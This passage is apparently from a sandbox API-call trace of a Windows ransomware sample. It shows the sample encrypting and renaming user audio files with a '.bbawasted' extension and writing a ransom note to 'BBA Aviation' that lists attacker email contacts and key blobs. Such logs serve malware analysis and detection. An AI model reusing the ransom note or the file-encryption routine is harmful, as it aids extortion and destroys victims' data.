FO1zk07d8BSqKxozZ4c=[end_key]\r\nKEEP IT\r\n") returned 984 [0222.493] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0222.493] WriteFile (in: hFile=0x290, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0222.494] SetEndOfFile (hFile=0x290) returned 1 [0222.496] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0222.497] CloseHandle (hObject=0x290) returned 1 [0222.497] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bc8e0 | out: hHeap=0x660000) returned 1 [0222.497] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bddf8 | out: hHeap=0x660000) returned 1 [0222.497] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a5f98) returned 1 [0222.498] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0222.498] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0222.498] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\9gcgmMDK1CkHfX6j.mp3") returned 60 [0222.873] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x282) returned 0x6c4b88 [0222.874] lstrcpyW (in: lpString1=0x6c4c00, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0222.874] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0222.874] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a5f10) returned 1 [0222.874] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0xa3a, pbBuffer=0x6bff48 | out: pbBuffer=0x6bff48) returned 1 [0222.874] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0222.874] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\9gcgmMDK1CkHfX6j.mp3.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\9gcgmmdk1ckhfx6j.mp3.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0222.875] WriteFile (in: hFile=0x290, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0222.876] SetEndOfFile (hFile=0x290) returned 1 [0222.876] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0222.877] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0222.877] lstrcpyW (in: lpString1=0x6c4c00, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0222.877] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\9gcgmMDK1CkHfX6j.mp3" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\9gcgmmdk1ckhfx6j.mp3"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\9gcgmMDK1CkHfX6j.mp3.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\9gcgmmdk1ckhfx6j.mp3.bbawasted")) returned 1 [0222.878] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\9gcgmMDK1CkHfX6j.mp3.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\9gcgmmdk1ckhfx6j.mp3.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0222.878] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0222.878] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x5e47 [0222.878] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5e47) returned 0x5f0000 [0222.878] CloseHandle (hObject=0x27c) returned 1 [0222.879] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0222.880] CloseHandle (hObject=0x288) returned 1 [0222.880] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0222.880] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a65f8) returned 1 [0222.881] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0222.881] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0222.881] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a62c8) returned 1 [0222.881] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0222.881] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0222.890] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0222.890] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0222.890] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0222.890] _snwprintf (in: _Dest=0x6bff48, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]qyaNlNxVUu2+yac2HGEpKhk9+uVXK52zGV8/yIi3j2cIogzA38Uv/zOX5qjBYuqV\r\nS/xZOvosEtcZ2xrf8do5U4ix6kHGcChOxmGrwKFok2v9bBvXsBwHPALXmQSusHjh\r\nVLCk2OfY7rKqcUCUr2acXM7akXkVOaWp6hmWbmuza+lPrRs4bs0f1Fr6XU2jyv+A\r\nWoCFkuG9ElcJ5GsQV8k4wvd8WxCq/6QyvIhkf/HhGgcZUQLHMNR37/ivRp5kl+AN\r\nj+hv9OpIefNM/XmNRdn9xiIwg5yw7r51h2K1JZIBmNQ3uNyLoqg+nqVg2V2lypNR\r\ne/6P5h7Ediv81tlImWeaa5MW5BGi7y+mTu4LWUifID1zMpYa1vFFMBOFf0QEZURA\r\nSQq91d51zCsC1pFA6V8lp0SFxr75EJiGYeIBIpRQfW608M6WOw6+NdIepQeJaqia\r\n3r32vcuItzIDGxdV++nt2d1nt9n+e4o/PUv7/1cv2DNrpQi/uos1nyp5oSCS4TnV\r\nUX8mn5yQTxE/JekEvqXXuC6lbOezfAOBqs7ZfSuTSohuS70vseL9X74b3cZ28Kz8\r\n8bpafQz/0JkAGASmxuX1Rie4Adwc8fLzMrew49maywpUfCsaCftK6sskWpoZSyIE\r\nlN+7A4r6qGWo2H0CFHLO5vUtbIWoagonaXtlWzkjNFw=[end_key]\r\nKEEP IT\r\n") returned 984 [0222.890] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0222.890] WriteFile (in: hFile=0x290, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0222.890] SetEndOfFile (hFile=0x290) returned 1 [0222.893] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0222.893] CloseHandle (hObject=0x290) returned 1 [0222.893] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0222.893] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a8770 | out: hHeap=0x660000) returned 1 [0222.893] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6680) returned 1 [0222.894] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0222.894] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0222.894] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\OaMa.wav") returned 48 [0222.894] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26a) returned 0x6a1cd0 [0222.894] lstrcpyW (in: lpString1=0x6a1d30, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0222.894] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0222.894] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6350) returned 1 [0222.895] CryptGenRandom (in: hProv=0x6a6350, dwLen=0xa3a, pbBuffer=0x6bff48 | out: pbBuffer=0x6bff48) returned 1 [0222.895] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0222.895] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\OaMa.wav.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\oama.wav.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0222.896] WriteFile (in: hFile=0x290, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0222.897] SetEndOfFile (hFile=0x290) returned 1 [0222.897] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0222.897] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0222.897] lstrcpyW (in: lpString1=0x6a1d30, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0222.897] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\OaMa.wav" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\oama.wav"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\OaMa.wav.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\oama.wav.bbawasted")) returned 1 [0222.898] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\OaMa.wav.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\oama.wav.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0222.898] CreateFileMappingW (hFile=0x288, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0222.898] GetFileSize (in: hFile=0x288, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x6b55 [0222.898] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6b55) returned 0x5f0000 [0222.898] CloseHandle (hObject=0x288) returned 1 [0222.900] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0222.900] CloseHandle (hObject=0x27c) returned 1 [0222.900] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0222.900] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6708) returned 1 [0222.901] CryptGenRandom (in: hProv=0x6a6708, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0222.901] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0222.901] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6680) returned 1 [0222.901] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0222.901] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0223.130] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0223.130] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0223.130] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0223.130] _snwprintf (in: _Dest=0x6bff48, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]m42t/cPivdo61umXrPCfuShKQ0mRjDFaU18s3s2058gEFQ/53JxzTsvR01n7Xh2P\r\nsSXY2LATiWflAezMUu3ViJ4nZZ5V/g0H55WIqb55iHY5vCgW0GTii3K2Jr3++0Cn\r\nL74ZJTKh1Mc+cL0vESOcmmHT9J9pOKVfKhFUMJauljUOVbljWeHjAD2qFl4HgRwx\r\n4NYM2MjsqWkpXAL1MbQpDaklPJVwcQXnxfUlJtUB9++EP65/nQamBLzEwJofS8Nc\r\nIu5X52PXZpS2PUkHNPyZJQ3thgZOO06f1lfavyYZUbSXDXsQeRQnfSFz/yrQDboV\r\ns+iiWue02XwbByF9h9oBHhhKQNIqkhCMtbAbdMUKsRJKr5EOJC9OjamMxq223Pqv\r\nDKS96zjny7ekeX6gJtqLaa97cfqTivH5/6NAkXWMSuEn4D2ZF5NigZPLzmFSIPbW\r\nn9r9D6J8h8BEvwK/aAHV8HDQvgmdTk/pkPctLpSr7KDVNFHed+oPRueTesnVFabY\r\nWrfgsItFa5zr8xNypLSJyjMS1hOzstrWuLol2jRL+lf0HohHHE1exm/ha5PWuVx6\r\nULH5XKdBT37UitpKKnbPAn1bUkhtH1kXLXKyEgN8k/nOfGDnQ1EvNO1tMHJ+tgZ4\r\n5qIGETwR+Uj2cyapia0e/QGXsIRNWkOYyJ8SIgRmShB=[end_key]\r\nKEEP IT\r\n") returned 984 [0223.130] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0223.130] WriteFile (in: hFile=0x290, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0223.130] SetEndOfFile (hFile=0x290) returned 1 [0223.133] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0223.133] CloseHandle (hObject=0x290) returned 1 [0223.133] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a1cd0 | out: hHeap=0x660000) returned 1 [0223.134] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b26b0 | out: hHeap=0x660000) returned 1 [0223.134] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6bd0) returned 1 [0223.135] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0223.135] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0223.135] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\pWayyLX2GrGs2x.wav") returned 58 [0223.135] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27e) returned 0x6c4b88 [0223.135] lstrcpyW (in: lpString1=0x6c4bfc, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0223.135] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0223.135] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6708) returned 1 [0223.136] CryptGenRandom (in: hProv=0x6a6708, dwLen=0xa3a, pbBuffer=0x6bff48 | out: pbBuffer=0x6bff48) returned 1 [0223.136] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0223.136] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\pWayyLX2GrGs2x.wav.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\pwayylx2grgs2x.wav.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0223.137] WriteFile (in: hFile=0x290, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0223.138] SetEndOfFile (hFile=0x290) returned 1 [0223.138] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0223.138] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0223.138] lstrcpyW (in: lpString1=0x6c4bfc, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0223.139] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\pWayyLX2GrGs2x.wav" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\pwayylx2grgs2x.wav"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\pWayyLX2GrGs2x.wav.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\pwayylx2grgs2x.wav.bbawasted")) returned 1 [0223.140] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\pWayyLX2GrGs2x.wav.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\pwayylx2grgs2x.wav.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0223.140] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0223.140] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x17e81 [0223.140] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x17e81) returned 0x5f0000 [0223.140] CloseHandle (hObject=0x27c) returned 1 [0223.144] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0223.146] CloseHandle (hObject=0x288) returned 1 [0223.146] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0223.146] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a63d8) returned 1 [0223.147] CryptGenRandom (in: hProv=0x6a63d8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0223.147] CryptReleaseContext (hProv=0x6a63d8, dwFlags=0x0) returned 1 [0223.147] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a65f8) returned 1 [0223.147] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0223.147] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0223.176] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0223.176] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0223.176] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0223.177] _snwprintf (in: _Dest=0x6bff48, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]B7Nzg5YYJYDM3RU8nXdX1hlopQv1ivzLJU8iAOZkN4szp0csn6UD4rxcoFeKghZK\r\nZMjN2K9gSqlO/ENrTPdrL5NJGrnOyp/WEgTfV/i/Stgks0UJGs0ZMz5UZS+2Y88d\r\ngZtyyVMHPHZFasE67uUC05qcBfAHj5ZeSFTwcv6zhUi1h65a4Igwo1P3hNmHWZGH\r\n8muOmSk0gLSPCqynnabOpuQF3w7XVngC2pL5J6dpYQtHcM/WM7vyM+MPO16F8T+k\r\ngIB8LjQYKUvZnqiUEvXePurzNWUuUOQKcfEfsbtFR8DTL4B0an8a1MPPWwjkbG8A\r\nz2c6Qy6ujueKvaqNROEkN6Sy3astuk9VBmImuMBZJUGalsDDuRqxGgAmFLprpVrM\r\n1oqqjpJlSax93D+UFDENNjwPJw/MEVEuJ+StbLk2lWWpE9XlRWw706kbvZkePHx8\r\nr6NrJ1YEf9BoFPCtSCUQDmt9FI2iGSy70MtiV2ZKBXiwiIf+hh5kjJ6T5CcL+RfY\r\nQnlVwUFexx1eTHJb2YAaR9xXj6hmuxCA+LJmxxF8XOpBAQMXIGt6pu+K2kUnw2VR\r\nQ/7GfyGp/Yhs16dr+9aehSEHlB9LCsm5azIKc7vYPJO0mZbPEn2nQl3DG9mJgFNu\r\nWsGpvPCD/oYbLkY1/tJ9v7MehkVTDR3o0670d67oCmv=[end_key]\r\nKEEP IT\r\n") returned 984 [0223.177] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0223.177] WriteFile (in: hFile=0x290, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0223.177] SetEndOfFile (hFile=0x290) returned 1 [0223.180] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0223.180] CloseHandle (hObject=0x290) returned 1 [0223.180] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0223.181] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aad98 | out: hHeap=0x660000) returned 1 [0223.181] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6240) returned 1 [0223.182] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0223.182] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0223.182] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\R4 59aOX93svl csSC.wav") returned 62 [0223.182] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x286) returned 0x6c4b88 [0223.182] lstrcpyW (in: lpString1=0x6c4c04, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0223.182] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0223.182] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6bd0) returned 1 [0223.183] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0xa3a, pbBuffer=0x6bff48 | out: pbBuffer=0x6bff48) returned 1 [0223.183] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0223.183] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\R4 59aOX93svl csSC.wav.bbawasted_info" (normalized: 